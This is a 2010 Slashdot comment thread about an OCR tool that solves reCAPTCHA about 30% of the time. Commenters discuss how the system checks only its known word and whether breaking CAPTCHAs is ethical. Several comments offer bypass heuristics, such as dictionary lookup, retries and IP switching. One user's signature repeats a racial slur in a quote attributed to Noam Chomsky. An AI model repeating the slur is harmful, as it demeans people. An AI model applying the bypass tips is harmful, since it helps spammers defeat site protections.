Not necessarily; I'm not sure exactly how reCAPTCHA works, but in theory they don't know one of the words - in fact, that other word may very well be unknowable, due to smearing or just not being a word (that happened to me the other day actually, I got one word and one thing that looked like a Farsi character). Thus, if you successfully guess the correct thing for the "known" word, it doesn't really matter what you guess for the "unknown" word as long as it's close or at least something a human might type.
Therefore, making the big assumption that this system correctly guesses both "known" and "unknown" words with equal chance, the algorithm's expected "win" percentage would be about 17%, not 1% as you claim.
Of course, I bet you anything that if reCAPTCHA gets a lot of wrong answers from a given IP address, they'll start sending pairs of known words in order to detect this sort of thing and to prevent pollution of their databases. That would give this algorithm a 1% win chance.
Re:far from it by hydrofix · 2010-08-05 09:53 · Score: 5, Informative

Since both words need to be correct "solve the current CAPTCHA at an efficacy of 1%" would be closer to the truth.
Actually, that is incorrect. The other word is already positively known by the OCR, and serves as a control, while the other is the one that the OCR could not read. It will of course only check the one that it knowns, and assumes the other one is then correct as well. So, if you get one of the words correct AND this is the same word that as their OCR identified correctly (which is very likely the case), then you pass, but most of the time (99%) give a bad answer for the harder, non-OCR word. Sadly, this leads to pollution of their database in the long run.
Re:far from it by Anonymous Coward · 2010-08-05 10:10 · Score: 0

Does this mean that if a lot of people were to consistently type the first word correctly, but enter "gnu" for the second word, they would pollute its database but still pass the test half the time?
Re:far from it by retchdog · 2010-08-05 10:15 · Score: 2, Insightful

Interesting. If this is true as stated, and one knew/modeled OCR performance, you could use this information in some cases to pick out the plum and boost the crack...

--
"They were pure niggers." – Noam Chomsky
Re:far from it by petermgreen · 2010-08-05 10:30 · Score: 1

I seem to remember recapatcha claiming that if they think they are being screwed with they switch to sending two known words rather than one known and one unknown

--
note: i'm known as plugwash most places but i screwd up registering that here somehow in the past and now can't register
Re:far from it by mugurel · 2010-08-05 10:37 · Score: 1

35% * 35% ~ 12%.
35% corresponds to P(A or B), not P(A), and you don't know if P(A)=P(B), neither whether P(A) and P(B) are independent.
P(A or B) = P(A) + P(B) - P(A and B)
.35 = P(A) + P(B) - .01
P(A) + P(B) = .35 + .01 = .36
If we assume that P(A) = P(B) = .36/2 = .18, then that implies that P(A) and P(B) are not independent, since .18*.18 != .01. And if they are independent P(A and B) = P(A)P(B), they can not be equal.
It looks more likely that P(A) and P(B) are independent and unequal, than that P(A) and P(B) are equal and dependent. It could be that the first word is often shorter than the second (or v.v.).
Re:far from it by retchdog · 2010-08-05 10:42 · Score: 1

meh. never mind. it'd only take twice as long at most, to just do your best on both. duh.
i guess if there were a limited number of attempts you might use this to decide which ones to attempt vs. reload.

--
"They were pure niggers." – Noam Chomsky
Re:far from it by Anonymous Coward · 2010-08-05 10:55 · Score: 0

There was a bit regarding recaptcha and 4chan. Apparently they hardened their system against such an attack.
Re:far from it by mysidia · 2010-08-05 11:04 · Score: 1

The order is random... you don't know which word is the first word and which is the less-certain one. Only reCaptcha knows that.
Re:far from it by Anonymous Coward · 2010-08-05 11:49 · Score: 0

Even if the probabilities are independent, if the algorithm gets at least 1 of the 2 correct 35% of the time, one should expect its probability of success per-word to be about 19.4%. (2p - p^2 = 0.35.) p^2 = 3.75%, not inconceivable given the small sample size.
Re:far from it by omnibit · 2010-08-05 12:12 · Score: 1

Mod parent up - I'm out of points!
Re:far from it by Anonymous Coward · 2010-08-05 12:17 · Score: 0

That's interesting. I didn't know that so many of the garbled words were "penis", like I was typing.
Re:far from it by Jorl17 · 2010-08-05 13:20 · Score: 4, Informative

This is not informative. As many have said. If You read: http://www.google.com/recaptcha/learnmore , you'll get it.

Here is the deal: reCAPTCHA presents two words. One is picked by it and is previously known. The other one is a word from a book that has been scanned. Said word is unknown to the reCAPTCHA system. When the user enters both words, reCAPTCHA checks to see if the known word has been properly recognized. If that is the case, then reCAPTCHA can assume that a human is answering. Given that a human is answering, then the second unknown word given by the human is most likely correct, because he/she will be able to recognize it as well. Using this system, reCAPTCHA works as a CAPTCHA (spam prevention) mechanism and also helps transforming old books/papers into digital format, such as the New York Times.

So, in practice, only one word has to be correct -- the word that reCAPTCHA knows. What's sad is that bots may contribute incorrect second words...

Next time, get informed before going all crazy.

And here is the relevant info, quoted from the aforementioned website:

reCAPTCHA improves the process of digitizing books by sending words that cannot be read by computers to the Web in the form of CAPTCHAs for humans to decipher. More specifically, each word that cannot be read correctly by OCR is placed on an image and used as a CAPTCHA. This is possible because most OCR programs alert you when a word cannot be read correctly. But if a computer can't read such a CAPTCHA, how does the system know the correct answer to the puzzle? Here's how: Each new word that cannot be read correctly by OCR is given to a user in conjunction with another word for which the answer is already known. The user is then asked to read both words. If they solve the one for which the answer is known, the system assumes their answer is correct for the new one. The system then gives the new image to a number of other people to determine, with higher confidence, whether the original answer was correct.

--
Have you heard about SoylentNews?
Re:far from it by 42forty-two42 · 2010-08-05 16:07 · Score: 1

Since recaptcha only actually checks one of the words, you actually have a 0.35 * 0.50 chance, or 17.5% chance of success. Of course, since google will just plug this back into their OCR algorithms, and recaptcha only uses things their OCR algorithms failed on in its captchas, any such advances are only temporary in nature.
Re:far from it by twocows · 2010-08-05 22:09 · Score: 1

That's not true, though. The way reCaptcha works is that only one word needs to be correctly solved. It's actually relatively easy for a human to tell which one needs to be solved; it's often the longer one or the one with unusual characters.
Re:far from it by twocows · 2010-08-05 22:11 · Score: 1

Er, the longer one or the one with unusual characters that *doesn't* need to be solved, that is.
Re:far from it by delinear · 2010-08-06 00:42 · Score: 1

It's a little confusing but the presentation seems to suggest if you get one of the words wrong too many times in succession - 32 it claims - it will log your IP and force you to get both right (I'm not sure how that works, maybe it uses a word with a large number of identical responses, or maybe it just generates two words it knows). It doesn't say if this is reset after you have successfully got both right, if it was you could still brute force it (the counter would reset after an average 100 entries if there's a 1% chance of matching both, in which case for every 132 entries you'd still get about a quarter of them through which is not a bad hit rate), if not the suggestion is "dynamic IP" - not particularly useful if you plan to spam thousands of these things.
Re:far from it by delinear · 2010-08-06 00:46 · Score: 1

You can make a reasonable guess as a human - the unknown word is usually unknown for a reason (archaic type rendering two letters together, an ink smudge on one letter, etc) which a human can spot with reaonsable accuracy once they know the trick. If they introduced some of these tricks on the known words they might make it more difficult (and of course, just because a human can spot the difference reliably, doesn't mean it's easy to do in software, as supported by the results in the video).
Re:far from it by delinear · 2010-08-06 00:52 · Score: 1

That depends - you say you're assuming there's an equal chance of spotting a known and an unknown word. It's more likely that his software is better at recognising the word that has been generated by an algorithm rather than some randomly obscured word (that was then run through the algorithm), so while the success rate for two known words might not be 30% there's a good chance that it would be better than 1%, since that figure is factoring in the ability to recognise a word that even Google's OCR couldn't realiably recognise.

The video shows nothing but failures by Anonymous Coward · 2010-08-05 09:12 · Score: 0

It isn't sufficient to get 30% of the characters right. "im bailiwick" is recognized as "iffy ballboy" and that result gets a 32.73% rating. Doesn't look broken to me.
Now 30% of the captchas, that would be something.

Re:The video shows nothing but failures by sexconker · 2010-08-05 09:49 · Score: 1

The percentages shown are a running total of all the captchas tested against in that run.
b is the % of cases where BOTH words were correctly recognized
s is the % of cases where AT LEAST ONE word was correctly recognized
You only need to know ONE word to pass a recaptcha captcha. Though it has to be the CORRECT word, and I don't know if the developers of this program knew which word was known, or if they took that into account when displaying the percentages.
The worst case scenario is that they can solve it about 1/6th of the time (getting one right 1/3 of the time, and having it be the right one 1/2 of those times). It stands to reason, however, that the "known" captchas (the ones recaptcha tests against) are the ones that are easier to solve, and thus, the actual success rate is indeed about 33%.

Plugin not needed... by knarf · 2010-08-05 09:13 · Score: 3, Informative

There's probably an excellent Firefox plugin to render this page's color scheme more bearable

No plugin needed:

View->Use Style->None

That is what it looks like in Seamonkey, Firefox will be similar. This more or less always works.

--
--frank[at]unternet.org

Re:Plugin not needed... by interval1066 · 2010-08-05 09:47 · Score: 1

Or if you're using ff 3.6....; View->Page Style->No Style.

--
Python: 'And then suddenly you have a language which says "we're all stuck with whatever the whiniest coder wants".'
Re:Plugin not needed... by c++0xFF · 2010-08-05 10:32 · Score: 1

This more or less always works.
You're not joking: it even makes the Time Cube site somewhat readable!

Hmm by Tailhook · 2010-08-05 09:15 · Score: 5, Funny

Should I run the DEFCON presenter's giant SWF or not?

o_O

--
Maw! Fire up the karma burner!

Re:Hmm by machxor · 2010-08-05 09:25 · Score: 2, Funny

Why not. You run Firefox right? If yes then you have no worries because it's not full of hole like IE is...
Re:Hmm by Chad+Birch · 2010-08-05 09:33 · Score: 1

You are disturbingly misinformed.

--
Sturgeon was an optimist.
Re:Hmm by machxor · 2010-08-05 09:45 · Score: 1

And you don't understand sarcasm... Or maybe I fail at it... Either way, cheers :-)
Re:Hmm by Monkeedude1212 · 2010-08-05 10:06 · Score: 2, Insightful

I'm glad YOUR common sense kicked in before hundreds of others.

Bad Hacking by pz · 2010-08-05 09:16 · Score: 4, Insightful

Why would anyone want to do this? It's like attacking the UN peace keeping troops or the Red Cross. reCAPTCHA is doing good work, digitizing scanned printed books so that the the text can be made available for online searching. Breaking reCAPTCHA is like defecating in the village well, ensuring that everyone suffers. No one benefits from reCAPTCHA being broken. No one.

--

Put my fist through my alarm clock with its ding-dong death inside my ear. - The Blackjacks.

Re:Bad Hacking by Anonymous Coward · 2010-08-05 09:26 · Score: 0

reCAPTCHA is used by a lot of web services to prevent spamming. Breaking it would allow spammers to infiltrate new websites.
The breaking of reCAPTCHA benefits a very select group of people (spammers) and hurts the rest of us.
Re:Bad Hacking by kyrio · 2010-08-05 09:28 · Score: 2, Informative

4chan already broke it.
Re:Bad Hacking by Dhalka226 · 2010-08-05 09:31 · Score: 5, Insightful

No one benefits from reCAPTCHA being broken. No one.
Spammers.
Re:Bad Hacking by Anonymous Coward · 2010-08-05 09:31 · Score: 0

Seriously? It's a security tool that administrators rely on. If it's breakable, someone will find a way. If a good person finds a flaw, I would hope like hell they let the world know.
Re:Bad Hacking by maxume · 2010-08-05 09:32 · Score: 5, Insightful

Actually, it could be of use to reCAPTCHA, they can just pass their test words through this system before they make them public and then use the output to help prevent similar attacks.

--
Nerd rage is the funniest rage.
Re:Bad Hacking by Anonymous Coward · 2010-08-05 09:34 · Score: 0

Perhaps. But what if someone else does the same thing but doesnt bother to say that they did it? Some of these are used to create accounts. Now those accounts could then be used to spam (what most of these scumbags are after) the forums behind the code.
I would rather know about it than have a mysterious 'yeah well maybe someone is hacking it'. It may lead to a better one?
Re:Bad Hacking by Purity+Of+Essence · 2010-08-05 09:35 · Score: 1

Advertisers benefit. Or rather, people who sell advertising and SEO services and work automated lead/sales referral systems. Their clients are probably hurt by all the forum spam done in their name. Look around you. Wherever there is money being made, there are assholes joining in.

--
+0 Meh
Re:Bad Hacking by rbcd · 2010-08-05 09:37 · Score: 1

The field of AI is advanced as CAPTCHAs are broken (eg: OCR). The great thing is that spammers work on this for us, too. When humans and computers cannot be separated, then we'll have computers that can pass the Turing test. AI research will have finished.
Re:Bad Hacking by Anonymous Coward · 2010-08-05 09:40 · Score: 0

Because they already knew how to do it. Now you know, and so do the reCAPTCHA folks.
Re:Bad Hacking by Flyne · 2010-08-05 09:42 · Score: 4, Insightful

The problem of breaking reCAPTHCA is precisely the same problem as increasing computer OCR abilities, since reCAPTCHA by design uses words which current OCR abilities are inadequate for. This is a good thing for AI and computer vision and text digitization.
Re:Bad Hacking by maxume · 2010-08-05 09:45 · Score: 1

Right, because human level intelligence is the obvious upper limit.

--
Nerd rage is the funniest rage.
Re:Bad Hacking by beothorn · 2010-08-05 09:53 · Score: 1

If it can be broken it must be broken.
Re:Bad Hacking by sbayless · 2010-08-05 09:58 · Score: 5, Insightful

No one benefits from reCAPTCHA being broken. No one
You couldn't be more wrong. Sure, breaking reCAPTCHA would create a headache for website admins (including me, for example), but in order to break reCAPTCHA someone has to devise a better text recognition program. And that's great news! This is an example of a general side effect of the cat and mouse game that are captchas. Captcha's are a simple form of Turing Test, where website admins are trying to determine who is a computer and who is a real human being. Every time a captcha gets broken, we get a sophisticated new algorithm for doing something that previously only humans could do (or only humans could do well, at least).
Re:Bad Hacking by rbcd · 2010-08-05 10:01 · Score: 1

That's an entirely separate and irrelevant discussion.
Re:Bad Hacking by Anonymous Coward · 2010-08-05 10:05 · Score: 0

Since we tend to consider people that think like ourselves as intelligent then yes. (Ever heard someone say "Great mind thinks alike."? Wouldn't it be more likely that average minds think alike?
If we run into something that is more intelligent than humans (Assuming that we have not done that yet.) we would probably just think it was stupid just because it didn't reach the same conclusions that we did.
I think you are absolutely correct here. By our current definitions human intelligence is indeed the upper limit.
Re:Bad Hacking by Anonymous Coward · 2010-08-05 10:27 · Score: 0

Not quite. If someone were to break reCAPTCHA with a nearly perfect success rate, the same algorithms could be very useful for digitizing old books. If reCAPTCHA becomes completely obsolete, this would mean that their work is done and all the old books can be automatically digitized at last.
Re:Bad Hacking by cant_get_a_good_nick · 2010-08-05 11:07 · Score: 1

It's not about breaking reCaptcha, it's about avoiding the reCaptcha hurdle on all the sites that use it. If a site put up a captcha, there's some resource it's protecting that other people want. This is a way to get it in a bulk way, therefore economically cheaper.
And you think that a person who can benefit with a fat check will care about some abstraction that they're polluting the village well? For money, people sell drugs that kill people. This is nothing compared to that.
Re:Bad Hacking by mysidia · 2010-08-05 11:09 · Score: 2, Insightful

reCaptcha, and indeed all Captchas have a fundamental flaw.... advances in computer vision will eventually render them all obsolete.
Most of the CS knowledge is already around to totally defeat captchas of this sort... it's only an Engineering question. They will most likely get broken when sufficiently unethical engineers are hired by sufficiently wealthy spammers.
It's basically a known fact, that spammers will eventually break conventional captchas totally, by developing algorithms to guess captcha answers. It's only a question of when and how long will it take them to figure out all the systems that matter.
This does not mean it is a respectable thing for people to specifically target Captcha and attempt to hasten its demise.
reCaptcha is a big one... but there are other Captcha systems that matter (like Google's).
And there are other ways around them besides software algorithms... Amazon-style mech turk, for example... find a few thousand folks in certain countries to pay $0.05/hour for breaking captchas, and suddenly reCaptcha is no longer a boundary.
Re:Bad Hacking by Timmmm · 2010-08-05 11:10 · Score: 3, Insightful

The problem of breaking reCAPTHCA is precisely the same problem as increasing computer OCR abilities
No it isn't. Well, not unless you read books with wavy crossed-out words and don't mind 30% accuracy.
Re:Bad Hacking by mysidia · 2010-08-05 11:12 · Score: 1

A 30% recognition rate is no good for useful OCR. It's only that beneficial when breaking Captchas.
30% just means you have to retry the captcha a few times.
Re:Bad Hacking by mysidia · 2010-08-05 11:14 · Score: 2, Insightful

Except the algorithm doesn't really do that... to defeat the captcha, it only needs to get it right about 10 or 20% of the time, to give the malicious script a "good enough guess" to brute-force the Captcha with 5 or 6 retries.
As long as the number retries are less than those the a fair percentage of humans require....
Re:Bad Hacking by cant_get_a_good_nick · 2010-08-05 11:17 · Score: 1

4chan didn't quite break it, more like they broke time's form implementation. They did a lot of 'hacks' but most was on how Time handled the poll - they didn't use any CAPTCHA at the beginning, then took the form offline, but not the voting script, so 4chan voted well past the cut off time, will millions of monkeys voting.
see reCaptcha blog and this well written article
Re:Bad Hacking by Anonymous Coward · 2010-08-05 11:31 · Score: 0

Incorrect. Captcha's are meant to be broken. Once the overlap between bad human readers and good computer readers is sufficient, then we can consider the problem of machine reading to be solved. Then you find the next hard AI problem and make a captcha for that.
Re:Bad Hacking by shird · 2010-08-05 11:45 · Score: 1

No the OP is pretty much right. 4chan has now implemented reCaptcha, yet is still getting hammered with spam. Thus some spammer using 4chan has managed to find a way around it with a pretty good success rate.

--
I.O.U One Sig.
Re:Bad Hacking by Osso · 2010-08-05 12:17 · Score: 1

Lots of books are less than 30% accurate :)
Re:Bad Hacking by lennier · 2010-08-05 13:39 · Score: 1

No one benefits from reCAPTCHA being broken. No one.
But wouldn't a universal algorithmic crack for reCAPTCHA imply an algorithm that could automatically tell the difference between a correct OCR transcription and nonsense? So just fold that algorithm into future open-source OCR libraries and watch the recognition rate soar. We're using black hat hackers to write AI code for us, and everyone wins! *
* Except John Connor, after Skynet starts reading the Hollywood rejected scripts vault.

--
You are not a brain: http://books.google.com/books?id=2oV61CeDx-YC
Re:Bad Hacking by bill_mcgonigle · 2010-08-05 15:20 · Score: 1

I went to a talk by one of their founders last year. The company philosophy is that they day their business is obsolete will be a great day for humanity.
That's pretty rare.

--
My God, it's Full of Source!
OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
Re:Bad Hacking by orange47 · 2010-08-05 18:02 · Score: 0, Redundant

no, not just spammers. millions of people would be free of it.
Re:Bad Hacking by discord5 · 2010-08-05 19:49 · Score: 1

Why would anyone want to do this?
Because CAPTCHA in essence is a flawed system, also because it's a fun "puzzle" and if you don't try to solve it someone else will.

It's like attacking the UN peace keeping troops or the Red Cross.
That's an overstatement if I've ever seen one, like that guy who posted here saying he felt raped when his employer didn't pay him. People just love to make controversial statements on slashdot. "Oh my god, someone found a bug for SSH and wrote an exploit. It's like that time some guy bashed in the window of my car with a rock and took my laptop, only to look up my personal information, come to my home and abduct my dog for ransom."

Breaking reCAPTCHA is like defecating in the village well, ensuring that everyone suffers. No one benefits from reCAPTCHA being broken. No one.
reCAPTCHA is about CAPTCHAs, and using CAPTCHAs to get stuff digitized. No matter how "good" the intentions are, the captcha system is horribly flawed and there is an increasing amount of libraries popping up to break captchas. I would say that any real advances made to breaking captchas has the benefit of having better OCR in the short run, and in the long run maybe we get to see a better solution for the problems captchas try to deal with.
Anyway, if this guy isn't trying it, a clever spammer will and trust me, they are trying. Captcha protected sites aren't really that impervious to spam lately.
Re:Bad Hacking by xtracto · 2010-08-05 20:32 · Score: 1

That, and a better JDownloader ^_^

--
Ubuntu is an African word meaning 'I can't configure Debian'
Re:Bad Hacking by whm · 2010-08-05 20:34 · Score: 1

No, it's a win-win situation. If they cannot solve reCAPTCHA then we get website security. If they do solve it, it means that we can digitize all of that content without any human interaction. This is great news.
Re:Bad Hacking by DrXym · 2010-08-05 20:37 · Score: 1

Well if some hacker can crack recaptcha then so can some random spammer. I run a website with captcha protection and the ratio of spambots to real humans has reached epidemic proportions. 95% of new applicants are spambots meaning they have managed to crack the image despite it being set to the maximum setting. Fortunately all new registrants require approval so even if they pass the captcha I can still weed them out but its still a pain in the arse.
Captcha schemes are quite good but they are vulnerable to a class break. I'm currently considering creating a unique challenge for my site to stop this crap. I think if I put a simple form next to it that had to be filled in it would stop the drivebys dead.
Re:Bad Hacking by Anonymous Coward · 2010-08-05 23:02 · Score: 0

Breaking reCAPTCHA is like defecating in the village well, ensuring that everyone suffers.
Welcome to the world of black hats
Re:Bad Hacking by orasio · 2010-08-06 00:40 · Score: 1

Why would anyone want to do this? It's like attacking the UN peace keeping troops or the Red Cross. reCAPTCHA is doing good work, digitizing scanned printed books so that the the text can be made available for online searching. Breaking reCAPTCHA is like defecating in the village well, ensuring that everyone suffers. No one benefits from reCAPTCHA being broken. No one.
Good OCR is more valuable than good captchas.
Re:Bad Hacking by Anonymous Coward · 2010-08-06 00:51 · Score: 0

I don't think you quite understand 4chan. Most of the spammers are so weird that I wouldn't be surprised if they are actually filling out the CAPTCHA for each spam.
Of course, there might be a flaw in 4chan's posting system, but they have an [un]surprisingly robust system.
Re:Bad Hacking by delinear · 2010-08-06 01:17 · Score: 1

I think the point is more that, once a computer can simulate the best of human thinking, it will be more productive to have the computer think about these issues. The computer can process the data faster and doesn't need food or sleep, and it's far easier to duplicate a computer process multiple times than to create more genius level humans (not to mention far quicker, none of that messy growing up and puberty stuff to deal with, just load the disk image and go).
Re:Bad Hacking by maxume · 2010-08-06 01:46 · Score: 1

So when I unpack "AI research will have finished." I am supposed to realize that the statement is qualified to humans doing AI research and that the research itself will really have just gotten started?

--
Nerd rage is the funniest rage.
Re:Bad Hacking by pz · 2010-08-06 09:05 · Score: 1

No one benefits from reCAPTCHA being broken. No one
You couldn't be more wrong. Sure, breaking reCAPTCHA would create a headache for website admins (including me, for example), but in order to break reCAPTCHA someone has to devise a better text recognition program. And that's great news! This is an example of a general side effect of the cat and mouse game that are captchas. Captcha's are a simple form of Turing Test, where website admins are trying to determine who is a computer and who is a real human being. Every time a captcha gets broken, we get a sophisticated new algorithm for doing something that previously only humans could do (or only humans could do well, at least).
No. No, no, no. Doing research into OCR and publishing the results is fantastic. It makes the world a better place.
Showing that you have written software to cheat a system that is in wide use to benefit society is morally wrong. It is bad.
Devising a better Turing test is good, coming up with a way of cheating the current one is bad.
Devising a better way to recognize counterfeit currency is good, coming up with a new way to counterfeit currency is bad.
Constructive behavior, good; destructive behavior, bad. Do I need to make it clearer?
Breaking reCAPTCHA is bad.

--

Put my fist through my alarm clock with its ding-dong death inside my ear. - The Blackjacks.
Re:Bad Hacking by Anonymous Coward · 2010-08-06 13:37 · Score: 0

reCAPTCHA benefit from it by knowing that their algorithms are flawed, and having the opportunity to improve them. Or would you rather that the discoverers of the flaws stayed quiet and hoped that no spammers discovered the flaws first?

Readability by pgn674 · 2010-08-05 09:19 · Score: 1

There's probably an excellent Firefox plugin to render this page's color scheme more bearable.

I like using a Readability bookmarklet in my bookmarks bar: Readability - An Arc90 Lab Experiment

Now i by Anonymous Coward · 2010-08-05 09:24 · Score: 0

GETCHA

an excellent Firefox plugin: by Anonymous Coward · 2010-08-05 09:26 · Score: 0

Try hitting ctrl-a.

And that, timothy, is the difference between a dork and a geek. You failed the Twit Filter at reCAPTCHA.

So many better ways than recaptcha by gurps_npc · 2010-08-05 09:38 · Score: 0

The whole point of these tests is to prove you are human by solving a dificult imaging (or audio) identification problem.

There is ZERO reason to use worthless tests like these as opposed to using real identification. That is instead of using computer generated difficult test, use actual pictures of actual 'difficult text' that an OCR agent failed to identify. Each person is given one alread tested sample and one unknown sample. If you get the already tested sample, then your answer is accepted as 'probable' correct for the unknown sample. Three matching probable correct = confirmed as correct, and move the unknown sample to the "already tested" section

There is more than enough written and audio samples that the world would love to see OCR'ed. We don't have to generate fake ones.

--
excitingthingstodo.blogspot.com

Re:So many better ways than recaptcha by sugarmotor · 2010-08-05 09:45 · Score: 1

You wrote, "There is more than enough written and audio samples that the world would love to see OCR'ed." -- Where do you get those?

--
http://stephan.sugarmotor.org
Re:So many better ways than recaptcha by Anonymous Coward · 2010-08-05 09:46 · Score: 0

I don't think you understand what reCAPTCHA does...
Re:So many better ways than recaptcha by Anonymous Coward · 2010-08-05 09:47 · Score: 0

You do realize that reCAPTCHA does exactly what you described?
Re:So many better ways than recaptcha by JesseMcDonald · 2010-08-05 09:49 · Score: 3, Informative

There is ZERO reason to use worthless tests like these as opposed to using real identification. That is instead of using computer generated difficult test, use actual pictures of actual 'difficult text' that an OCR agent failed to identify. Each person is given one alread tested sample and one unknown sample. If you get the already tested sample, then your answer is accepted as 'probable' correct for the unknown sample.
Congratulations, you've just described ReCAPTCHA! This is exactly how the current system works.

--
"The state is that great fiction by which everyone tries to live at the expense of everyone else." - Bastiat
Re:So many better ways than recaptcha by Lunix+Nutcase · 2010-08-05 10:35 · Score: 1

In other words.... use reCAPTCHA?
Re:So many better ways than recaptcha by SmlFreshwaterBuffalo · 2010-08-05 14:59 · Score: 1

...and how in the hell do you OCR an audio sample???
Re:So many better ways than recaptcha by neminem · 2010-08-06 08:40 · Score: 1

Step 1: open it in notepad...

Is this related? by Khyber · 2010-08-05 09:48 · Score: 4, Interesting

Anybody that pays attention to 4chan recently knows they had to implement captcha due to a massive spamflood of infected morons. recaptcha got busted thanks to someone in /g/ who leaked the vulnerability in the sound system for reCAPTCHA, and the whole site was again inundated with spam, though not to the degree as the original spam attack.

--
Still waiting on Serviscope_minor to wake up to fucking reality and realize that Jessica Price isn't going to fuck him.

Re:Is this related? by Dice · 2010-08-05 10:36 · Score: 1

The audio vulnerability is unrelated, and more effective than the algorithm presented in TFA.
Re:Is this related? by Monkeedude1212 · 2010-08-05 11:26 · Score: 1

Anybody that pays attention to 4chan
What, all 200 of them?
Re:Is this related? by Anonymous Coward · 2010-08-05 12:10 · Score: 0

When Anonymous manipulated the Time Top 100 poll results to spell "Marble cake also the game" out of the first letters of the first names of the top ranked people making Moot the #1 ranked person in the poll, they figured out that they only had to type in the "real looking" word to pass reCAPTCHA.
You can do a search for "moot wins, Time Inc. loses" to find the blog entry containing a link to the full set of rules they used for deciding which word to enter in reCAPTCHA.
It sounds like reCAPTCHA generates one word that sort of looks like it came from a book instead of using an image of a word from a previously solved CAPTCHA.
To approximate a person picking the "real" word, a program could try to look up both scanned words in a dictionary. If only one of them was found, just enter that one in reCAPTCHA.
Re:Is this related? by Anonymous Coward · 2010-08-05 14:00 · Score: 0

4chan is about 1% as relevant as everyone who thinks 4chan is relevant thinks.
Re:Is this related? by MostAwesomeDude · 2010-08-05 17:53 · Score: 1

I was going to note this. It's to the point where 4chan is actively exhausting the reCAPTCHA dictionaries, causing interesting words to show up. Half the time, one of the words is some kind of kanji or untypeable symbol now.

--
~ C.
Re:Is this related? by Anonymous Coward · 2010-08-05 20:50 · Score: 0

As in all things technology related, pornography related activites tend to advance the state of the art. In this case 4chan, that incestuous hive of scum and villainy, will become a proving ground for various autonomous visual/audio recognition systems now that the spammers have to up their game. There are some smart polish and ukrainian programmers who are going to give them trouble...

How is this 30% accurate??? by mwvdlee · 2010-08-05 10:02 · Score: 3, Insightful

When it is claimed to be 30% accurate, I'd expect some 30% of all captchas being correcly guessed. Watching the video, I noticed the algorithm gives itself 30-40% scores for getting just one of the two words right or sometimes even for getting the right length and a few correct letters. Didn't watch it to the end, but in the few minutes I watched, ZERO entire captcha's were solved. So that's ZERO% acurate in my book. For instance, actual captcha text "ware readiness", guessed captcha "votarry rehabbed", reported accuracy 38.24%... how the hell is that over 38% accurate? If you had that level of accuracy when trying to get past a captcha (which is pretty much the definition of it being vulnerable, right?), you wouldn't get past a single captcha. it's 30% accurate if it correcly guessed about 3 out of every 10 captcha's, not if it fails every single captcha.

--
Slashdot social media options: AIM, ICQ, Yahoo, Jabber and Mobile Text. Why no MySpace?

Re:How is this 30% accurate??? by Timmmm · 2010-08-05 11:11 · Score: 1

You only need to get one (specific) word right.
Re:How is this 30% accurate??? by Anonymous Coward · 2010-08-05 12:58 · Score: 0

You must not be familiar with reCAPTCHA. Only one of the words (usually the one that's easier to read) is (or can be) actually checked. The other is a word that couldn't be identified with OCR and reCAPTCHA is exploiting the (presumably) human user to read it. Next time you encounter a reCAPTCHA, you should be able to only enter the clearer work correctly and enter whatever you please for the more garbled word. And the "accuracy" in this case is a measure of how often it can bypass the CAPTCHA, which is roughly 30% of the time. If this technique could decode both words with 30% accuracy, then it would probably make it the best OCR application in the world, being able to decode already difficult cases that have also been deliberately distorted.
Re:How is this 30% accurate??? by wdavies · 2010-08-05 13:05 · Score: 1

mod this up. I hadn't gotten the implication of the exploit either until now.
Re:How is this 30% accurate??? by afaik_ianal · 2010-08-05 14:20 · Score: 1

As a number of others have stated, the reCAPTCHA server only knows the answer to one of the words it's giving you. You only need to get the "easy" one right to be passed as a human. Getting the "hard" word right makes no difference in terms of passing the test.
If this were getting 30% accuracy on the hard words, then that would be *real* news.
I suspect this is getting slightly lower success than they're reporting, as that 38% figure is assuming they're only getting the easy words right, but in actual fact they're bound to get only the hard one right every now and then.
Re:How is this 30% accurate??? by Anonymous Coward · 2010-08-05 14:39 · Score: 0

You are not paying close enough attention. That rating was the accuracy being tracked overall, not for that specific image. It only has to get one word of the two right, and it can be a character off. The percentage claimed resembles how often it will defeat recaptcha autonomously.
Re:How is this 30% accurate??? by Anonymous Coward · 2010-08-05 14:48 · Score: 0

30% is pretty significant even if it's only one word. remember that this is a landmark for an algorithm that's not supposed to work.
I'm pretty certain that this SHOULD be an NP-complete problem.
Re:How is this 30% accurate??? by Anonymous Coward · 2010-08-05 15:21 · Score: 0

One known and one unknown word is used. In order to pass the test, you need only get the known word correct. The unknown word is how they keep the whole thing profitable, translation service and all that.
Re:How is this 30% accurate??? by Anonymous Coward · 2010-08-05 17:09 · Score: 0

38.24% is 13/34 representing the percentage of correct single word guesses. The one before the 38.24% is 13/33 = 39.39% correct.
Take a look at number 7 instead.
cap actual: zests the
result: zesty very
But it still say it got a single word correct. 1/6 = 16.67% becomes 2/7 = 28.57%.
Re:How is this 30% accurate??? by yuhong · 2010-08-05 17:44 · Score: 1

That raises a question. If most of the time when this succeed they only get the easy word right, how would that pollute the digitalization of the text?
Re:How is this 30% accurate??? by Anonymous Coward · 2010-08-06 02:44 · Score: 0

FFS please READ how recaptcha works. It's explained on their website and it's been discussed here.

Impossible captcha's by aegis3d · 2010-08-05 10:32 · Score: 0

Talking about 4chan, there's currently an hilarious thread about impossible captcha's: http://boards.4chan.org/r9k/res/10509296 (note, it is of course 4chan, be careful there, although this is r9k, not the worst of boards.. )

On the bright side by MadGeek007 · 2010-08-05 10:49 · Score: 1

Maybe this hack can be used to improve book scanning.

off topic by Anonymous Coward · 2010-08-05 11:54 · Score: 0

where's the /. story on wikileaks "insurance" file? come on come on......

Re:Bad Hacking vs Penetration Testing by billstewart · 2010-08-05 12:14 · Score: 1

If reCAPTCHA's too easily breakable, then Bad Guys will figure out how, and will start exploiting sites that use reCAPTCHA for protection.

So we need to know how vulnerable it is, and the reCAPTCHA folks need to figure out how to fix it. It's an arms race, always has been, probably always will be.

--

Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks

%30 seems about right by dilvish_the_damned · 2010-08-05 12:19 · Score: 1

since thats about the accuracy of a human

--
I think you underestimate just how much I just dont care.

New Human Verification Scheme by BlueMonk · 2010-08-05 12:39 · Score: 3, Interesting

Seeing this article gave me an idea to come up with a new human verification process. I created a C# program in about an hour that loads images from Google images based on searching for 3 of 2000+ nouns. It shows 3 examples of each noun and asks the user to pick the correct noun from a list of 6. This program is just a proof of concept of course. Could this become useful? (Binary and source code included.)
http://enigmadream.com/misc/HumanVerification.zip

Re:New Human Verification Scheme by afaik_ianal · 2010-08-05 14:37 · Score: 1

